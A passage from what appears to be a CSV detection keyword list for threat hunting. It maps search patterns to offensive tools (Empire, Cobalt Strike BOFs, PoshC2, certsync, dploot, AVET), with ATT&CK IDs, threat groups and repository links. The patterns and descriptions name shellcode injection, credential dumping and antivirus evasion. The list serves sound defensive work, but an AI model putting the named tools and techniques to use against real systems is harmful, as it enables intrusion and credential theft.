the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*inject-shellcode *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*injectShellcode*","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","1","N/A","10","10","875","158","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z" +"*InjectShellcode*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 
- TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*InjectShellCode.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*InjectShellCodeRemote.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*InjectShellCodeWMIFSB64*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*injectsu.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*inligpkjkhbpifecbdjhmdpcfhnlelja*","greyware_tool_keyword","Free One Touch VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*inline_assembly -Assembly *","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*inlineAssembly*/execmethod*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" 
+"*inlineDll*/dll*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" +"*inline-exec.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*inline-execute *","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","0","N/A","10","10","481","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" +"*inline-execute *.o*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*inline-execute *tokenprivileges.o*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" +"*inline-execute StartWebClientSvc.x64.o*","offensive_tool_keyword","NTLMRelay2Self","An other No-Fix LPE - NTLMRelay2Self over HTTP (Webdav).","T1078 - T1078.004 - T1557 - T1557.001 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/med0x2e/NTLMRelay2Self","1","0","N/A","10","4","349","45","2022-04-30T19:02:06Z","2022-04-30T10:05:02Z" +"*inline-execute*whereami.x64*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 
T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/whereami","1","1","N/A","10","10","152","27","2023-03-13T15:56:38Z","2021-08-19T22:32:34Z" +"*inlineExecute.nim*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*InlineExecute-Assembly*","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - 
Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","1","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" +"*InlineShellcode*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" +"*InlineWhispers.py*","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/InlineWhispers","1","1","N/A","10","10","286","42","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z" +"*InlineWhispers2*","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon 
Object Files (BOF) via Syswhispers2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Sh0ckFR/InlineWhispers2","1","1","N/A","10","10","172","29","2022-07-21T08:40:05Z","2021-11-16T12:47:35Z" +"*Input line too long.*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z" +"*input/shellcode_enc_raw.txt*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*input/shellcode_raw.txt*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*ins1gn1a/Frampton*","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","POST Exploitation tools","https://github.com/ins1gn1a/Frampton","1","1","N/A","N/A","1","69","16","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z" +"*InsecurePowerShell*","offensive_tool_keyword","InsecurePowerShell","powershell without securities features","T1059 - T1086 - T1117","TA0002 - TA0003 - TA0040","N/A","N/A","Defense Evasion","https://github.com/cobbr/InsecurePowerShell","1","0","N/A","N/A","1","98","18","2017-12-19T03:40:33Z","2017-12-17T02:16:21Z" +"*insecurityofthings*jackit*","offensive_tool_keyword","jackit","This is a partial implementation of Bastilles MouseJack exploit. See mousejack.com for more details. Full credit goes to Bastilles team for discovering this issue and writing the libraries to work with the CrazyRadio PA dongle. Also. thanks to Samy Kamkar for KeySweeper. to Thorsten Schroeder and Max Moser for their work on KeyKeriki and to Travis Goodspeed. 
We stand on the shoulders of giants.","T1210 - T1212 - T1560 - T1562","TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/insecurityofthings/jackit","1","0","N/A","N/A","8","756","138","2020-10-01T04:37:00Z","2016-07-01T23:21:56Z" +"*insert_top_100_passwords_1_G*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*InsidePro-PasswordsPro.rule*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*InspectAssembly.csproj*","offensive_tool_keyword","InspectAssembly","Inspect's a target .NET assembly's CIL for calls to deserializers and .NET remoting usage to aid in triaging potential privilege escalations. ","T1055.012 - T1027 - T1112","TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/matterpreter/OffensiveCSharp/tree/master/InspectAssembly","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*InspectAssembly.exe*","offensive_tool_keyword","InspectAssembly","Inspect's a target .NET assembly's CIL for calls to deserializers and .NET remoting usage to aid in triaging potential privilege escalations. 
","T1055.012 - T1027 - T1112","TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/matterpreter/OffensiveCSharp/tree/master/InspectAssembly","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*install powershell-empire*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*install * roadrecon*","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","1","N/A","N/A","10","1355","206","2023-10-04T08:58:38Z","2020-03-28T09:56:08Z" +"*install 
amass","offensive_tool_keyword","Amass","In-depth subdomain enumeration tool that performs scraping. recursive brute forcing06/01/2021 crawling of web archives06/01/2021 name altering and reverse DNS sweeping","T1593 - T1594 - T1595 - T1567 - T1569","TA0007 - TA0009 - TA0004 - TA0005 - TA0011","N/A","N/A","Information Gathering","https://github.com/OWASP/Amass","1","0","N/A","N/A","10","10160","1761","2023-09-19T11:29:11Z","2018-07-10T16:05:08Z" +"*install bloodhound*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","0","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*install c2tc-domaininfo*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*install cdn-proxy*","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","0","N/A","N/A","3","213","25","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z" +"*install certsync*","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","0","N/A","N/A","6","567","65","2023-07-25T15:22:06Z","2023-01-31T15:37:12Z" +"*install 
coercer*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*--install -d kali-linux*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","0","wsl installation","N/A","N/A","N/A","N/A","N/A","N/A" +"*install dploot*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z" +"*install gobuster*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*install h8mail*","offensive_tool_keyword","h8mail","Powerful and user-friendly password hunting tool.","T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001","TA0010","N/A","N/A","Information Gathering","https://github.com/opencubicles/h8mail","1","0","N/A","N/A","1","9","5","2019-08-19T09:46:33Z","2019-08-19T09:45:32Z" +"*install hakrawler*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - 
T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","0","N/A","6","10","3971","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" +"*install hping3*","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","0","N/A","N/A","10","1297","326","2022-10-04T12:14:24Z","2012-06-13T17:41:54Z" +"*install hydra-gtk*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*install impacket*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat 